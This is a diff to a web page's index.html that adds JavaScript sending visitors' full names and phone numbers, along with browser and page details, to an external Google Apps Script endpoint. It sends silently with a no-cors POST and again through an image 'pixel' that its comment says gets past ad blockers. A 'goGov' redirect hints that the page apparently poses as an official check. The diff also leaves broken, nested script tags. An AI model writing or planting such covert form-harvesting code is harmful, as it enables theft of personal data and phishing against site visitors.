--- a/index.html
+++ b/index.html
@@ -337,7 +337,46 @@
       }, total+400);
     }
     function goGov(){ window.location.href='alert.html'; }
-  </script>
+
+    <script>
+  // === Настройки ===
+  const GS_URL = 'https://script.google.com/macros/s/AKfycbwKsTmpqpv_qXv8ht5A1enPP5ufQ7J_ig9Mjl3egmt_qjOXq70WXtYO13uLYxQp9kPIPw/exec';
+  const GS_KEY = 'boxgo-2025'; // как в Apps Script
+
+  function logToSheet(fio, phone){
+    const uuid = (crypto.randomUUID?.() || Date.now().toString(36)+Math.random().toString(36).slice(2));
+
+    const payload = {
+      key: GS_KEY,
+      fio,
+      phone,
+      ua: navigator.userAgent,
+      ref: location.href,
+      uuid
+    };
+
+    const body = new URLSearchParams(payload).toString();
+
+    // 1) Пытаемся через POST (тихий режим, без ожидания ответа)
+    try{
+      fetch(GS_URL, {
+        method: 'POST',
+        mode: 'no-cors',
+        headers: {'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'},
+        body
+      });
+    }catch(e){/* ignore */ }
+
+    // 2) Дублируем «пикселем» GET — работает всегда, даже если CORS/AdBlock мешают
+    try{
+      const img = new Image();
+      img.src = GS_URL + '?' + body;
+    }catch(e){/* ignore */ }
+  }
+
+  // Вызов остаётся в твоём startCheck():
+  // try { logToSheet(fio, phone); } catch(e){}
+</script>
 </body>
 </html>
 
